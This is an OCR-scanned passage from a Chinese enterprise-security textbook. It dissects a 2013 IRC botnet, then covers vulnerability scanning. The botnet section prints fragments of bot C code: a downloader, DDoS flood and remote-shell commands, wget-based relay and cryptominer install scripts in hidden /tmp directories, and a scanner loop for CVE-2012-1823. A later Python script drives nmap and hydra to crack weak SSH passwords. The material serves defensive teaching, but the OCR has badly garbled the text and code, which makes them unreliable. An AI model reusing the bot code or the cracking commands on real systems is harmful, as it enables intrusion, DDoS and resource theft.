率 越 来 越 高 。 


8.7.2 ”僵尸 网 络 架 构 


这 里 分 析 一 个 2013 年 内 捕获 的 僵尸 网 络 ， 其 功能 特点 非常 具有 代 
表 性 。 以 下 是 其 各 功能 模块 分 析 。 


1. 下 载 者 


人 负责 接收 控制 者 指令 ， 下 载 更 新 功能 模块 。 如 下 所 示 : 


f%s HITP/1.0\r\nConmnection: Keep-Alive\r\nUser—Agent: 
f; a bitmap, image/jpeg, 1 F 
z “s buf+it+1, buf) ; 


\n", sender) ; 


while(1) | 
ini L: 
if ((i=recv(sock2, bufm, 4096, 0)) <= 0) break; 
if ti x bufm[i]=0; 
for (d=0:;d<i:d++) if (!strncemp (bufmtd, “\rinirin",4)) { 
for (dt=4:d<i:d+) fputc(bufm[d], file): 
goto done; 


done: 
Send(sock, “NOTICE Ws :Saved as “s\n”, sender, argvr[2]) ; 


2. 传 播 中 继 站 


EF Za iea 7 SRA CERERA bomes, ANA] BEF 
传播 源 集中 到 一 个 地 方 ， 所 以 稍 常 在 肉鸡 上 建立 中 继 站 。 


在 这 个 案例 中 ， 它 会 搭建 一 个 简易 的 webserver 来 实现 。 


17birw sh 
rm -rf ins_ht. sh* 
if [ | -f /tmp/. ICE-unix/-log/htdocs/httpd ]; then 
mkdir /tmp/. ICE-unix 
mkdir /tmp/. ICE-unix/-log 
mkdir /tmp/. ICE-unix/-log/htdocs/ 


ed /tmp/. ICE-unix/-log/htdocs/ 
rm -rf darkhttpd* 

weet http://unixdlyfe. org/gitweb/darkhttpd/blob_p le ain/HEAD: /darkhttpd. c 
if [ | -f /tmp/. ICE-uni RE 


e 
weet http:/ /oii ,. cu. cc: 3548 Giardia die 


3A Pita 


EN-E (eit EE “UTR”, GEOR A irc 
这 里 攻击 者 预 设 了 2 个 域名 作为 Server 通 信 地 址 ， 而 域名 解析 到 的 
IP 是 可 随时 更 换 的 ，ircbot 随 机 连接 到 任 一 个 Server。 


YA What you want this to hide as 
// Channel to join 
/i The key of the channel 
// Must change this to equal number of servers down there 


ff List the servers in that format, always end in (void*)0 


(void«) 0 


此 ircbot 有 多 个 基础 功能 ， 如 DDoS、 执 行 命令 、 自 杀 、 更 换 
Server ` 切换 静 默 状 态 (Disables all packeting) 等 。 


elp(int sock, char *sender, int argc, char **argv, 

if (mfork(sender) | 

Send (sock, “NOTI - A <target> <secs> ial packeter that wont be blocked by most firew 
n“, sender): sle 

Send (sock, “NO s :PAN <target» <port> < s> An advanced syn flooder that will kill most network 

, sender); 
Send (sock, “NOT get> < secs» A udp flooder\n", sender); sleep (2); 
Send (sock, “NOTIC ; 0 tz ‘secs Another non-spoof u Flooder\ ); sleep(2); 


Semnd(sock，“NOTICE %s :NICK <nick> Changes the nick of the client\n", sender); sleep (2) 


Send (sock, “NOT £ zer) s servers\n", sender); sleep (2) 
Send (sock, “Ni . SPO he current spoofin: » sender) (2 
Send (sock, “NOTIC : SPO t> Changes spoofing to a subnet\n", sender): sleep (2) 


Send (sock, “NOTICE %s :DISABLE Disables all packeting from this client\n“, sender) ; 
sleep (2); 

Send(sock, “NOTICE %s : ENABLE nables all packeting from this client\n", sender) 
sleep (2); 


Send (sock, “NOTICE % LL client\n”, sender); sleep (2); 

Send (sock, “NOTIC T <http addre s> = n s a file off the web and s it onto the 
hd\n", sender); sleep ; 

Send (sock, “Ni N 

Send (sock, “NO L all rren pac 

Send (sock, “NOTICE %s : = this\n > sander}: 


Send (sock, “NOTICE % <command> = Sends this command to the server\n", sender); sleep ( 


Send(sock, “NOTICE %s :SH <command» Executes a command\n", sender); sleep (2) 
exit (0); 


.蠕虫 特色 功能 


Ircbot 都 古 那 些 古 老 的 功能 ， 下 面 这 些 第 前 才 是 各 种 不 同 BotNet 符 
有 的 。 


漏洞 扫 搞 攻击 


本 案例 中 是 PHP CGI 的 RCE (CVE-2012-1823) 


vir:~/tl/aa/tmp # ls 

ChangeLog Makefile TODO bm.h inst ipsort ipsort.sgml php.c 
pnscan.1 pnscan.o 

version.c ws 

LICENSE README bm.c bm.o install-sh ipsort.1 php pnscan 
pnscan.c 

pnscan.sgml version.o 

vir:~/tl/aa/tmp # head php.c 

/* Apache Magica by Kingcope */ 

/* gcc apache-magika.c -o apache-magika -lssl */ 

/* This is a code execution bug in the combination of Apache and PHP. 

On Debian and Ubuntu the vulnerability is present in the default install 
vir:~/tl/aa/tmp # cat ws 

#!/bin/bash 

while [ 1 ]; do 

# _ A=`echo $(( (($RANDOM<<15)|$RANDOM) % 255 + © )) 


___A=~echo $(( $RANDOM % 255 + © ))` 
__B=$(( ((RANDOM<<15)|RANDOM) % 255 + © )) 
./pnscan -w"HEAD / HTTP/1.0\r\n\r\n" -r"Server: Apache" -t 1000 
$ _A.$ _B.0.0/16 80 
#echo $ A.$ _B 
#sleep 20 
done 


黑人 矿工 


现在 的 “黑客 ”早已 不 是 之 前 案 尚 目 由 、 宗 尚 技 术 极 致 的 时 代 了 ， 
金钱 才 是 他 们 最 终 目 的 ， 所 以 我 们 也 在 此 Bomet 中 发 现 了 “ 挖 据 机 ”*"， 并 
且 于 心病 狂 的 墨客 同时 进行 2 种 网 络 匿名 货币 的 挖掘: bitcoin 和 
primecoin， 充 分 榨 干系 统 性 能 。 


wget https://github. com/thbaumbach/ptsminer/jarchive/master. zip -0 ptsminer.zip --no-check-certificate 
unzip ptsminer. zip 

rm -rf ptsminer. zip 

cd pte sminer-ma: 


-IC ZE- unix \/lib/” makefile. my 
\finclude/’ makefile. ny 


J 
make -f makefile. my ptsminer 


cp ptsminer /tmp/. ICE-unix/-log/dlogd 
cd /tmp 
rm -rf ptsminer* e 


[ z | grep -v grep | grep “dlogd gone | wo -1) -eq 0 ]: then 
cd / /tnp. ICE-unix/ ~log/ 


Bitcoin 挖 掘 机 


unzip prim 

rm -rf primecoin. zip 
cd primecoin* 

ca src 


” makefile. my 
\/lib $(LDFL: 
cp primeminer /tmp/. ICE-unix/ 


cd /tmp 
rm -rf primeminer* 


ables -I INPUT -p tcp 
[ Sips -x | grep -v grep | grep “ 
f. ICE-unix/-log 


此 案例 中 的 攻击 者 并 不 满足 于 Web 漏 洞 进来 获得 的 普通 权限 ， 还 通 
过 系统 漏洞 ， 以 及 社工 〈 信 息 采 集 ) 方式 获得 root 权 限 。 


rd 


洞 工具 如 下 : 


日 
AIS JUTE 


total 483 
drwxr-xr-x 
drwxr-xr-x 
—LWRI-KI-X 
Terres 
—rwer-xI-x 
—Ywer-xr-x 
—Ywer-xIr-x 
=IWXI TZIZ 
—LwRI-xXI-x 
—rwxr-xIr-x 
—YWKI-XI-x 
—YWer-xXI-x 
—rwxr-xIr-x 
—Ywer-xIr-x 
~YWRI-XI-x 
drwxr-xr-x 
drwxr-xr-x 
-EWXEWZIWX 
—YWwRrwxr-x 
一 TVCXL 一 XI 一 
—Ywer-xI-xX 
—rwer-xr-x 
—LWXI-XI-x 
a Pe o ey 
—YwWexI-xXI-x 


root root 

root root 

root root 

root root 45046 Nov 

root root 21753 Nov 

root root 25201 Nov 

root root 3004 Nov 

root root 6472 Nov 

root root 6237 Nov 

root root 2598 Nov 2 

root root 24584 Nov 

root root 1572 Nov 

root root 23078 Nov 2 

root root 6307 Nov 

root root 4775 Nov 

root root 600 Nov 

root root 628 Nov 2 

root root 1205 Nov 15 2 aS 

root root 7067 Nov 0 merican-sign-langua 
root root 1682 Nov 

root root 2634 Nov 19 2013 pe ets 
root root 9004 Nov 19 2013 caps-to-root. cx 
root root 3 Nov 23 2013 comp* 

root root Nov 2013 cwx 

root root 64 Nov 2015 de 


je 


疏 取 conf 用 于 密码 root 猜 解 如 下 : 


count=0 
blankLine=" 


echo ” [-] Cautam fisierele de configurare... 


find / -name “*conf*. php“ ZAR PAL ZA /dev/null 
TOTAL= grep -c . PATHS 


ù 


GATA ca am obosit 
[+] Cautam TTA in fisier 


通过 上 壕 分 析 ， 我 们 可 以 看 到 此 伪 尸 网 络 利 用 CVE-2012-1823 漏 润 
大 肆 传 播 ， 并 且 利 用 被 控 的 肉鸡 进行 2 种 网 络 货币 的 控 据 ， 充 分 榨取 肉 
鸡 系 统 资源 。Botnet 架 构 如 图 8-33 所 示 。 


Botnet 架构 
更 多 受害 者 ff 2 @ 
IRC-Server ALG 


nite 


图 8-33 ”BotNet 架 构 


8.7.3 应 对 僵尸 网 络 威胁 


图 8-34 是 2013 年 11 月 某 新 出 的 0day 导 致 的 蠕虫 (Botnet) 爆发 ， 图 
表示 同期 Botnet 攻 击 党 试 趋势 统计 。Botnet 从 建立 到 履 灰 是 有 其 生命 周 
期 的 ， 如 图 8-35 所 示 ， 如 果 发 现 得 早 是 可 以 及 时 修补 漏洞 ， 建 立 阻 断 策 
略 ， 避 免 其 危害 扩散 。 


日 常安 全 工作 中 通过 对 入 侵 检测 数据 的 分 析 ， 能 感知 到 僵尸 网 络 
的 演变 以 及 0day\1day\Nday 的 攻击 趋势 。 当 僵尸 网 络 在 其 初期 ， 尚 未 形 
成 规模 之 时 ， 如 果 及 时 联合 业界 安全 联盟 加 以 打击 ， 必 将 其 扼杀 在 摇 
管 。 合 作 形 式 参见 图 8-36。 


通 音 BAT 这 类 公司 目 有 业务 和 服务 融 的 规模 庞大 ， 作 为 一 个 目标 
巨大 的 “靶场 ”又 是 一 个 分 布 式 的 大 “ 密 饶 ”， 如 果 能 充分 挖掘 其 数据 潜 
力 ， 定 能 帮助 业界 共同 提升 安全 水 平 。 


图 8-34 ” Botnet 攻击 党 试 统计 


图 8-35 “Botnet 生 命 周 期 


图 8-36 合作 方式 


nk 


8.8 BAB 


在 企业 初期 ， 安 全 工作 的 主要 内 容 通 稼 是 购买 安全 设备 或 者 部 车 
开源 安全 软件 。 可 能 安全 岗位 的 职责 也 束 是 仅 限于 部 署 安全 系统 以 及 
确保 其 稳定 运行 。 但 后 来 通常 会 发 现 安全 状况 并 没有 得 到 有 效 改善 ， 
其 根本 原因 束 是 没有 深耕 细作 ， 深 入 运营 。 


安全 产品 与 方案 ， 那 么 是 否 逐 一 部 署 承 能 解决 
安全 问题 呢 ? 答案 是否 定 的 。 通 稼 每 个 安全 产品 和 系统 的 人 研发 都 有 其 
既定 的 应 对 的 安全 场景 ， 在 采购 部 车 之 前 ， 你 是 否 有 评估 过 我 们 的 企 
业 到 撒 面 临 哪些 风险 ， 对 应 的 应 该 选择 什么 安全 产品 和 方案 ? 


SSF ANS 


每 年 企业 内 部 网 络 环境 总 会 出 现 很 多 的 安全 事件 ， 在 我 们 匆忙 应 


急 ， 焦 头 烂 额 的 解决 之 后 ， 没 有 多 久 同 类 事件 在 男 个 角落 可 能 义 会 发 
生 ， 于 古 乎 安全 工程 师 们 就 变 映 为 一 个 个 救火 队员 。 俗 话说 “一 个 人 不 


能 在 同一 个 坑 里 控 两 次 ”， 我 们 迫切 需要 通过 对 安全 事件 闭环 运 膏 ， 完 
善 每 次 发 现 的 短 板 。 


.可 量化 的 安全 能 力 


ice) 


安全 工作 中 我 们 会 不 断 建设 各 种 安全 系统 ， 上 各 种 安全 解决 方 
案 ,， 但 古 很 可 能 还 十 不 能 解决 一 个 问题 ， 我 们 的 安全 能 力 到 底 能 打 多 
少 分 ? 在 下 一 波 黑 客 攻击 、 新 漏洞 \ 凤 虫 出 现 的 时 候 ， 我 们 能 阻 断 \ 发 
现 多 少 事件 ? 现 有 的 安全 系统 足够 解决 全 部 的 问题 了 吗 ? 


第 9 章 AAt 


漏洞 扫描 、 入 侵 感 知 和 应 急 啊 应 是 技术 维度 日 第 工作 中 最 重要 的 3 


NATO AN 
aba ° 


9.1 概述 


漏洞 是 指 缺 少 安全 措施 或 采用 的 安全 措施 有 缺陷 ， 可 能 会 被 攻击 
者 利用 ， 对 企业 的 信息 资产 的 安全 造成 损害 。 汤 洞 扫 揪 束 是 利用 扫 摘 
堪 发 现 凋 洞 的 过 程 。 


企业 的 安全 工程 师 在 业务 上 线 前 或 对 公司 所 有 资产 进行 周期 性 地 
例 行 扫描 ， 可 以 在 被 攻击 者 发 现 可 利用 的 漏洞 之 前 发 现 并 修复 ， 将 可 
能 带 来 的 损害 减少 到 最 低 ， 对 企业 信息 安全 来 说 有 积极 主动 、 防 患 于 
未 然 的 作用 。 外 部 黑客 渗透 前 需要 踩点 ， 在 得 知 域名 及 IP 等 有 限 的 信 
息 逐 步 进 行 党 试 、 还 需要 绕 过 ACL、IDS、WAF 等 防御 措施 。 企 业内 部 
扫描 可 以 直接 拿 到 所 有 服务 器 的 资产 列表 、 所 有 Web 的 域名 及 在 每 个 
IDC 部 署 扫描 服务 器 ， 所 以 内 部 扫描 更 加 方便 、 更 全 面 。 但 是 群众 的 智 
营 是 无 穷 的 ， 即 便 是 这 种 信息 不 对 称 的 情况 下 ， 外 部 的 墨客 或 白 帽 子 
总 有 办 法 找到 漏洞 ， 所 以 各 大 互联 网 公司 纷纷 都 建立 了 自己 的 应 急 响 
应 中 心 (俗称 SRC) ， 并 给 报 漏 洞 的 白 帽 子 发 丰厚 的 奖励 。 ( 注 : 当 
下 的 SRC 已 经 不 只 奖励 漏洞 ， 同 时 还 奖励 举报 的 危害 线索 ) 可 以 说 内 
部 扫描 可 以 发 现 99% 以 上 的 漏洞 ， 剩 余 的 则 需要 建立 应 急 响 应 中 心 借助 
CRAFT ( 众 测 ， 类 似 众 筹 的 一 种 形式 ) 一 起 消灭 掉 ， 比 如 
接收 外 部 白 帽 子 提供 的 漏洞 和 威胁 情报 信息 并 进行 奖励 。 图 9-1 为 国内 
某 知 名 SRC 的 某 白 帽子 兑换 奖励 的 截图 。 
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iPad mini 3 


2015 年 12 月 04 日 
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图 9-1 SRCI) 


9.2 dail Fa APPR 


9.2.1 按 汤 润 类 型 分 类 


按 扫 摘 的 调 洞 的 类 型 及 目标 不 同 ， 可 以 将 漏洞 扫 摘 分 为 以 下 几 
种 : 


ACL 扫描 

: 弱 口 令 扫描 

系统 及 应 用 服务 漏洞 扫描 
"Web 漏洞 扫描 


1.ACL 扫 描 


ACL 扫 搬 是 用 来 按 一 定 的 周期 监视 公司 服务 右 及 网 络 的 ACL 的 ， 
比如 无 需 对 外 开放 的 端口 或 下 是否 暴露 在 了 公 网 中 。ACL 扫 描 器 的 作 
RAT: 


1) 安全 部 门 可 以 根据 扫描 报告 督促 网 络 管理 员 和 系统 管理 员 关闭 
暴露 在 公 网 中 的 高 危 服务 ， 避 免 重 要 的 服务 因 放 在 公 网 中 被 入 侵 的 风 
险 。 


is 


K 


2) 等 某 些 应 用 或 某 些 版 本 的 应 用 发 现 新 漏洞 时 ， 安 全 部 门 可 以 快 
速 从 数据 库 中 得 到 存在 漏洞 的 服务 及 版 本 ， 直 接 报 到 业务 部 门 去 修 
复 。 


ACL 扫 描 的 周期 至 少 为 一 天 一 次 ， 对 于 不 同 规模 服务 磊 的 企业 可 
以 采用 以 下 的 方式 : 


1) 对 于 服务 器 数量 较 少 的 公司 ， 可 以 直接 用 nmap 扫 摘 ， 并 将 扫 摘 
出 来 的 IP、 端口 、 应 用 服务 名 、 应 用 和 版本、 时 间 等 信息 存放 到 数据 库 
rH o 

2) 对 于 服务 郁 数 量 很 多 的 公司 ， 可 以 用 Masscan 扫 摘出 所 有 的 端 
口 信息 ， 然 后 再 用 nmap 去 识别 端口 的 协议 及 应 用 程序 版 本 信息 ， 可 以 
根据 实际 情况 部 署 扫 摘 服务 瑚 的 数量 、 形 成 分 布 式 的 殿 构 ， 加 快 扫 摘 
速度 。 


2. 弱 口令 扫 摘 


管理 员 因 芷 忽 大 意 或 安全 意识 薄弱 给 网 络 设备 、 服 务 器 或 应 用 使 
用 了 默认 的 和 简单 的 口令 ， 这 种 弱 口 令 的 设备 挂 在 公 网 上 后 很 快 就 被 
黑客 或 蠕虫 扫 朱 到 并 快速 渗透 。 和 单 见 的 扫 摘 希 如 Nessus、x-scan、h- 
scan、Hydra 都 具备 弱 口 令 扫描 的 功能 ， 其 中 hydra 文 择 的 服务 列表 如 
P: 


asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get}http[s]- 


{ get|post}-form http-proxy http-proxy-urlenum 


icq imap[slirc Idap2[s]ldap3[-{cram|digest}md5][s]mssql mysql (v4) 


nntp oracle-listener oracle-sid pcanywhere 


pcnfs pop3[s]postgres rdp redis rexec rlogin rsh s7-300 sip smb 


smtp[s]smtp-enum snmp 


socks5 ssh sshkey svn teamspeak telnet[s]vmauthd vnc xmpp 


È: 弱 口 令 是 高 危 漏 洞 ， 扫 描 到 后 需要 业务 部 门 第 一 时 间 修 复 。 


以 下 为 一 个 Python 调 用 hydra 扫 描 SSH 弱 口令 的 脚本 ， 殷 摘 结 束 后 
会 将 结果 写 到 一 个 文本 文件 中 : 


import os 

import re 

import glob 

import datetime 

# import subprocess 

import torndb 

from bs4 import BeautifulSoup 

# honeypot white db 

db_info = dict( 
hostname='127.0.0.1', 
database='honeypot', 
username=' Xxxxx', 
password='xxxxxx 


) 


# Nmap scan class 


class NmapScaner (object): 
def _ init__(self, ip_list, exclude file): 
self.dir = '/data1/ssh_scan' 
self.ip_list = "%s/%s" % (self.dir, ip_list) 
self.exclude_file = exclude_file 
self.report = "%s/report_%s.xml" % (self.dir, str(datetime.datetime.now() ) 
[:10]) 
self.ssh_list = "%s/report_%s.ssh" % (self.dir, 


str(datetime.datetime.now())[:10]) 
self.cmd = '/usr/bin/nmap -iL %s --excludefile %s -p 22,8022 -oX %s -n -- 
open -vv' % ( 
self.ip list, self.exclude_ file, self.report 


) 
self.hosts = [] 
def start(self): 
print self.cmd 
os.system(self.cmd) 
# p = subprocess.Popen(self.cmd, shell=True) 
# p.wait() 
def result(self): 
print "report: ", self.report, type(self.report) 


pi = r'<address addr="(.+?)" addrtype=".*"></address>' 
ri = re.compile(p1) 

p2 = r'<port portid="(.+?)" protocol=",.*">' 

r2 = re.compile(p2) 


soup = BeautifulSoup(open(self.report).read()) 
results = soup.find_all("host") 
for item in results: 
host = dict() 
host["ports"] = list() 
ret_ip = ri.findall(str(item.address) ) 
if ret_ip: 
ip = ret_ip[0] 
host["ip"] = ip 
for port in item.ports: 
ret_port = r2.findall(str(port) ) 
if ret_port: 
host["ports"].append(ret_port[0]) 
self.hosts.append(host) 
# print hosts 
f = open(self.ssh_list, "w") 
for item in self.hosts: 
ports = item.get('ports') 
ip = item.get('ip') 
if ip in CONST_HONEYPOT: 
continue 
for port in ports: 
f.write('%s:%s\n' % (ip, port)) 
return self.ssh_list 
# Crack ssh passwd 


class CrackSSH(object): 
def _ init__(self, ssh_filename): 
self.ssh_file = ssh_filename 
self.dir = '/datai1/ssh_scan' 
self.dir1 = '/datai/ssh_scan/scan_ssh' 
self.hydra = '/usr/local/bin/hydra' 
def prepare(self): 
cmd = "rm -f %S/x*' % self.dir1 
print cmd 
os.system(cmd) 
cmd = "/usr/bin/killall -9 hydra" 
os.system(cmd) 
# ret = subprocess.call(cmd, shell=True) 


# print ret 

os.environ = '/datai/ssh_scan' 

cmd = "cd %s;/usr/bin/split -1 2000 %s' % (self.diri, self.ssh_file) 
# print cmd 


# ret = subprocess.call(cmd, shell=True) 
# print ret 


os.system(cmd) 
os.environ = None 
def scan(self): 
search = r'%s/x*' % self.diri 
# print search, type(search) 
iplist = glob.glob(search) 
# print iplist 
for ip in iplist: 
cmd = '%s -vV -L %S/user.txt -P %S/password.txt -M %S ssh -0 
%S.log -t 4 -w 10 -e nsr >> %s.log &' % \ 
(self.hydra, self.dir, self.dir, ip, ip, self.ssh_file) 
# print cmd 
os.system(cmd) 
# Honeypot white list 


class HoneyWhite(object): 
def _ init__(self): 
self.db = torndb.Connection( 
host=db_info.get('hostname'), database=db_info.get('database'), 
user=db_info.get('username'), password=db_info.get('password' ) 


self.whiteList = [] 
def result(self): 
sql = "select * from honeypotip" 
ret = self.db.query(sql) 
for item in ret: 
self.whiteList.append(item.get('ip').strip()) 
return self .whiteList 
# Main Function 


if name == ' | main_': 

# get honeypot white list 

honey_white = Honeywhite() 

CONST_HONEYPOT = honey_white.result() 

print "Honeypot white list\n", CONST_HONEYPOT 

start_time = datetime.datetime.now() 

ip_list_file = 'ip_list_test.txt' 

exclude_file = "exclude_file.txt" 

h_exclude_file = open(exclude_file, "w") 

for ip in CONST_HONEYPOT: 
h_exclude_file.write("%s\n" % ip) 

h_exclude_file.close() 

nmap_scanner = NmapScaner(ip_list_file, exclude_file) 

nmap_scanner.start() 

ssh_file = nmap_scanner.result() 

end_time datetime.datetime.now() 

use_time (end_time - start_time).seconds / 60.0 

print "Start Time:%s, End Time:%s, Cost %s minutes" % (start_time, end_time, 

use_time) 

# start to crack ssh weak password 

crack_ssh = CrackSSH(ssh_file) 

crack_ssh.prepare() 

crack_ssh.scan() 


3. 系 统 及 应 用 服务 漏 ; 


司 扫 摘 


Fe OLAS Ast Re DF AR SS Al TS tei ae A Nessus RITA openVAS, 5 
AIRS eB EAN, eB 2 GNessushkH ax ll Sere cee TIT ° 


实践 方法 如 下 : 


1) 用 程序 调用 Nessus 的 接口 ， 将 Nessus 的 漏洞 扫描 做 成 周期 性 任 
务 ， 每 天 对 全 部 服务 器 进行 一 次 安全 扫描 ， 并 将 扫描 结果 入 库 ， 按 漏 
洞 级 别 进行 分 级 。 


2) 程序 自动 建立 工 单 并 提交 到 业务 部 门 进行 修复 ， 修 复 好 后 再 转 
到 安全 部 门 确 认 ， 形 成 一 个 民 性 的 财 环 《如 采 你 所 在 的 公司 没有 工 单 
系统 ， 则 至 少 需要 建立 一 个 漏洞 管理 系统 代替 


YE: Nessus 官 方 提供 的 REST API 接 口 的 GitHub 地 址 为 : 


https://github.com/tenable/nessrest ° 

4.Web 漏 洞 扫 描 
业内 第 用 的 web 漏洞 扫 摘 工具 列表 如 下 : 
.Acunetix Web Vulnerability Scanner (AWVS) 
-IBM Rational AppScan 


‘sqlmap 


“W3af 


-arachni 


‘Zed Attack Proxy 


DEJ Ladies, GRRE WE, Ja Late TUR © 

实践 方法 如 下 : 

网 站 较 少 的 公司 。 安 全 工程 师 手 工 用 扫 接 右 进 行 Web 汤 洞 扫 揪 即 
可 ， 但 至 少 要 使 用 2 球 以 上 扫 摘 右 进 行 交 义 确认 ， 避 人 免 因 录 款 扫 搬 大 沁 
报导 致 漏洞 没 扫 到 而 被 外 界 黑 客 利用 的 情况 发 生 。 一 般 建 议 AWVS 必 
用 ， 再 配合 zap 或 arachni 进 行 确 认 。 


网 站 较 多 的 公司 。 大 中 型 的 互联 网 公司 有 成 干 上 万 个 大 大 小 小 的 
网 站 ， 安 全 工程 师 人 肉 利 用 扫描 工具 进行 扫描 已 经 不 现实 了 ， 需 要 自 
研 扫 摘 工 具 ， 实 现 目 动 化 、 批 量化 的 漏洞 扫 摘 。 篆 见 的 一 个 目 动 化 Web 
漏洞 扫 拉 万 的 架构 图 9-2 所 示 。 


自动 化 Web 安全 检测 平台 
自动 化 安全 检测 平台 


”检测 引擎 


任务 提交 平台 


图 9-2 ”自动 化 Web 安 全 检测 平台 
9.2.2 ” 按 扫 摘 絮 行为 分 类 
根据 扫描 器 是 否 主动 发 包 的 行为 ， 可 将 扫描 器 分 为 以 下 几 种 : 
1) 主动 扫描 
2) 半 被 动 扫描 器 
3) 全 被 动 扫描 器 
1. 主 动 扫 描 


单 规 的 扫描 天 都 是 主动 发 包 ， 人 然后 根据 返回 的 包 判 断 目 标 设 备 旦 
否 存 在 漏洞 。 对 于 Web 扫 搬 器 来 襄 ， 是 先 将 URL 疏 出 来 ， 然 后 再 在 该 


URL 中 各 个 可 以 输入 参数 的 地 方 测试 注入 、XSS 等 负载 。 常 用 的 
AWVS、Sqlmap、Nessus 等 都 是 主动 扫描 器 。 


2. 半 被 动 扫 摘 
其 实 该 类 扫描 器 还 是 属于 主动 扫描 器 ， 区 别 是 URL 的 获取 途径 不 
是 爬虫 ， 而 是 以 下 几 种 方式 。 
(1) 通过 Access log 获 取 URL 
例如 将 用 户 或 QA 访问 站 点 的 Access log 去 重 后 进行 扫描 。 


(2) 通过 流量 镜像 的 方式 获取 URL 


通过 卷 路 镜像 得 到 全 流量 URL， 去 重 后 进行 扫描 。 对 于 比较 大 规 
模 的 Web 闹 源 扫 摘 ， 可 以 通过 Storm 流 式 计算 平台 将 来 目 分 光 的 全 流量 
URL 库 rewrite 奉 换 ， 去 重 归 一 ， 验 证 真实 性 后 作为 扫描 器 的 输入 源 ， 由 
消 妃 队 列 推送 至 分 布 式 扫 摘 需 中 。 以 下 为 一 个 利用 WAF log ` GHZ 
及 流量 镜像 中 的 URL 作 为 输入 源 的 扫 摘 大 的 架构 如 图 9-3 所 示 。 


(3) HTTP 代 理 式 的 扫描 器 


RTT SU QA BA EMA AEA, ZED boa “ME, 
RAVI AVA UE, BEDI] —SURLMLS RM ABA, Æ 
本 的 框架 代码 如 下 : 


WAF 日 志 


bedel 


图 9-3 ”URL 库 作为 扫描 器 输入 源 


class ProxyHandler(tornado.web.RequestHandler): 
SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT'] 
@tornado.web.asynchronous 
def get(self): 
url_info = dict( 
method=self.request.method, 


url=self.request.uri 


self.request_info = None 


def handle_response 


(response): 
if (response.error and not 
isinstance(response.error, tornado.httpclient.HTTPError)): 
self.set_status(500) 
self.write('Internal server error:\n' + str(response.error) ) 
else: 
self.set_status(response.code) 
for header in ('Date', 'Cache-Control', 'Server', 'Content-Type', 
"Location'): 
v = response.headers.get (header ) 
if v: 
self.set_header(header, v) 
v = response.headers.get_list('Set-Cookie' ) 
if v: 
for i inv: 
self.add_header('Set-Cookie', i) 
if response. body: 
self .write(response. body) 


# Insert http request and response into mongodb 
if self.application.scan: 
url = url_info.get('url') 
url_filter = UrlFilter(url) 
if url_filter.filter(): 
http_info = HttpInfo(url_info, self.request_info, response) 
values = http_info.get_info() 
mongodb = Mongodb(db_info) 
mongodb. insert(values) 
self.finish() 
body = self.request.body 
self.request_info = self.request 
if not body: 
body = None 
try: 
fetch_request ( 
self.request.uri, handle_response, 
method=self.request.method, body=body, 


headers=self.request.headers, follow_redirects=False, 
allow_nonstandard_methods=True) 
except tornado.httpclient.HTTPError as e: 


if hasattr(e, 'response') and e.response: 
handle_response(e.response) 

else: 
self.set_status(500) 
self.write('Internal server error:\n' + str(e)) 
self.finish() 


完整 的 demo 代 码 请 参考 : https://github.com/netxfly/passive_scan ° 

(4) vpn 式 的 扫 撒 需 

与 前 一 种 类 似 ， 不 过 该 种 扫描 需要 播 入 一 个 特定 的 VPN 中 ， 在 vpn 
服务 硕 中 会 设置 一 个 透明 代理 ， 将 80 和 443 端 口 的 数据 转发 到 透明 代理 


中 ， 之 后 测试 者 每 访问 一 个 URL 也 会 放 到 后 台 去 扫描 ， 以 下 的 golang 代 
码 束 实现 了 一 个 透明 代理 : 


package main 
import ( 


"Flag" 

"Fmt W 

"github.com/netxfly/Transparent -Proxy-Scanner/hyperfox/proxy" 
"github.com/netxfly/Transparent -Proxy-Scanner/hyperfox/tools/capture" 
"strings" 

// “github.com/netxfly/Transparent -Proxy-Scanner/hyper fox/tools/logger" 
"github.com/toolkits/slice" 

"log" 

"net/http" 

"net/url" 

"Os W 

"time" 

"upper .io/db" 

"upper .io0/db/mongo" 


) 
const version = "0.9" 
const ( 
defaultAddress = `0.0.0.0` 
defaultPort = uint(3129) 
defaultSSLPort = uint(3128) 
) 
const ( 
Host = "127.0.0.1" 
Port = "27017" 
User = "xsec" 
Password = "x@xsec.io" 
Database = "passive_scan" 
) 


var settings = mongo.ConnectionURL{ 
Address: db.Host(Host), // MongoDB hostname. 


Database: Database, // Database name. 
User: User, // Optional user name. 
Password: Password, // Optional user password. 
} 
var ( 
flagAddress = flag.String("1", defaultAddress, "Bind address.") 
flagPort = flag.Uint("p", defaultPort, "Port to bind to, default is 
3129") 
flagSSLPort = flag.Uint("s", defaultSSLPort, "Port to bind to (SSL mode), 
default is 3128.") 
flagSSLCertFile = flag.String("c", "", "Path to root CA certificate.") 
flagSSLKeyFile = flag.String("k", "", "Path to root CA key.") 
) 
var ( 
sess db.Database 
col db.Collection 
) 
var ( 


static_resource []string = []string{"js", "css", "jpg", "gif", "png", "exe", 
"Zip", "rar", "ico", 
"gz", "72", "tgz", "bmp", "pdf", "avi", "mp3", "mp4", "htm", "html", 
"shtml"} 
) 
// dbsetup sets up the database. 
func dbsetup() error { 
var err error 
// Attemping to establish a connection to the database. 
sess, err = db.Open(mongo.Adapter, settings) 
fmt.Println(sess) 
if err != nil { 
log.Fatalf("db.Open(): %q\n", err) 
} 


// Pointing to the "http_info" table. 
col, err = sess.Collection("http_info") 
return nil 


} 
// filter function 


func filter(content_type string, raw_url string) bool { 


ret := false 


if strings.Contains(content_type, "text/plain") || strings.Contains 


(content_type, "“application/x-gzip") { 
url_parsed, _ := url.Parse(raw_url) 
path := url_parsed.Path 
t := strings.Split(path[1:], ".") 
suffix := t[len(t)-1] 


if !slice.ContainsString(static_resource, suffix) { 
ret = true 
} 
} 
return ret 
} 
// Parses flags and initializes Hyperfox tool. 
func main() { 
var err error 
var sslEnabled bool 
// Parsing command line flags. 
flag.Parse() 
// Opening database. 
if err = dbsetup(); err != nil { 
log.Fatalf("db: %q", err) 
} 
// Remember to close the database session. 
defer sess.Close() 
// Is SSL enabled? 
if *flagSSLPort > 0 && *flagSSLCertFile != "" { 


sslEnabled = true 
} 
// User requested SSL mode. 
if sslEnabled { 
if *flagSSLCertFile == "" { 
flag.Usage() 
log.Fatal(ErrMissingSSLCert ) 


} 

if *flagSSLKeyFile zz oun { 
flag.Usage() 
log.Fatal(ErrMissingSSLKey) 

} 


os.Setenv(proxy.EnvSSLCert, *flagSSLCertFile) 
os.Setenv(proxy.EnvSSLKey, *flagSSLKeyFile) 


} 
// Creatig proxy. 


p := proxy.NewProxy() 
// Attaching logger. 
